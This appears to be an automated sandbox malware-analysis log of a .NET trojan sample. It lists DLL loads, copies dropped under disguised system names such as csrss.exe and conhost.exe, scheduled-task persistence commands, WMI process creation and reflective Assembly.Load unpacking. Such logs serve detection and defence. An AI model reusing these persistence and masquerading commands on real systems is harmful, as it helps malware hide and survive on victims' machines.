                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: sspicli.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: mscoree.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: version.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: wldp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: amsi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: userenv.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: profapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: rasman.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: rtutils.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: winmm.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: winmmbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: mmdevapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: devobj.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ksuser.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: avrt.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: edputil.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: dwrite.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: audioses.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: msacm32.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: midimap.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: windowscodecs.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: version.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: version.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: wldp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: amsi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: userenv.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: profapi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: sspicli.dll
                    Source: KtMg6d1Ivx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: KtMg6d1Ivx.exeStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: dZtDLPHWGnqMECrRIGtvnUL.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: csrss.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: dZtDLPHWGnqMECrRIGtvnUL.exe0.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: Registry.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: conhost.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.005859375
                    Source: bveMYDWO.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.KtMg6d1Ivx.exe.31534e8.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: vnUJHstD.log.39.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@48/38@0/1
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Users\user\Desktop\bveMYDWO.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\8b84723727d281c0c38b48504ff9e8dd56cb8ea2e6bc00074482592907dbb462
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Users\user\AppData\Local\Temp\23b8df4fb50b40e3abc14d2d8b04fea4a7f18d74Jump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat"
                    Source: KtMg6d1Ivx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: KtMg6d1Ivx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: KtMg6d1Ivx.exeReversingLabs: Detection: 75%
                    Source: KtMg6d1Ivx.exeVirustotal: Detection: 72%
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile read: C:\Users\user\Desktop\KtMg6d1Ivx.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\KtMg6d1Ivx.exe C:\Users\user\Desktop\KtMg6d1Ivx.exe
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP"
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP"
                    Source: unknownProcess created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
                    Source: unknownProcess created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\conhost.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnUL" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe'" /rl HIGHEST /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oZ7RJBQMGt.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: unknownProcess created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe C:\Windows\ImmersiveControlPanel\pris\conhost.exe
                    Source: unknownProcess created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe C:\Windows\ImmersiveControlPanel\pris\conhost.exe
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe
                    Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
                    Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: unknownProcess created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe"
                    Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: unknownProcess created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe "C:\Windows\ImmersiveControlPanel\pris\conhost.exe"
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe "C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe"
                    Source: unknownProcess created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe "C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe"
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdlineJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdlineJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /fJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Microsoft\d28c056a32d4fcJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Schema\ee2ad38f3d4382Jump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\886983d96e3d3eJump to behavior
                    Source: KtMg6d1Ivx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: KtMg6d1Ivx.exeStatic file information: File size 1342951 > 1048576
                    Source: KtMg6d1Ivx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.pdb source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.pdb source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: KtMg6d1Ivx.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: dZtDLPHWGnqMECrRIGtvnUL.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: csrss.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: dZtDLPHWGnqMECrRIGtvnUL.exe0.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: Registry.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: conhost.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdline
